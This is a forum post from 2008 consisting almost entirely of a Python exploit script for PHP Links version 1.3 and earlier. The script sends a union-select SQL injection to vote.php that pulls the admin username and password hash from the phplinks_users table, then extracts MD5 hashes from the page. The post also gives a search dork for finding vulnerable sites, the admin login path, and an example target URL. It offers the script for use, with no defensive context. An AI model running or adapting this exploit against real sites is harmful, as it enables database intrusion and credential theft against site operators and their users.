baltazar Administrator
Broj poruka : 2253 Godina : 41 Lokacija : Koceljeva Datum upisa : 01.12.2006
| Naslov: [Python] PHP Links <= 1.3 Sre Feb 06, 2008 4:53 pm | |
| - Kod:
-
#!/usr/bin/python #baltazar
#PHP Links <= 1.3
#b4ltazar[at]gmail[dot]com
import sys, urllib2, re, time
print "\n\t b4ltazar[at]gmail[dot]com" print "\t"
sql = ["vote.php?id=-1%20union%20select%20concat(user_name,0x3a,user_pass),2,3,4,5,6%20from%20phplinks_users%20where%20user_id=1--"]
if len(sys.argv) != 2: print "\nUsage: python phplinks.py <<site>>" print "\nExample: python phplinks.py http://www.hazardkyonline.com/links/" print "\nDork : Powered by PHP Links from DeltaScripts" print "\nAdmin login: http://Target/path/admin/ " sys.exit(1) host = sys.argv[1].replace("/index.php" , "") if host[-1] != "/": host = host+"/" if host[:7] != "http://": host = "http://"+host print "\n[+] Site:" ,host print "[+] SQL Loaded..."
print "[+] Starting Scan ...\n" for sql in sql: time.sleep(3) print "[+] Trying:" ,host+sql.replace("\n","") try: source = urllib2.urlopen(host+sql.replace("\n", "")).read() md5s = re.findall("[a-f0-9]"*32,source) if len(md5s) >=1: print "[!]" ,host+sql.replace("\n" ,"") for md5 in md5s: print "\n[+]MD5:" ,md5 except(urllib2.HTTPError): pass print "\n[-] Exploit finished\n" | |
|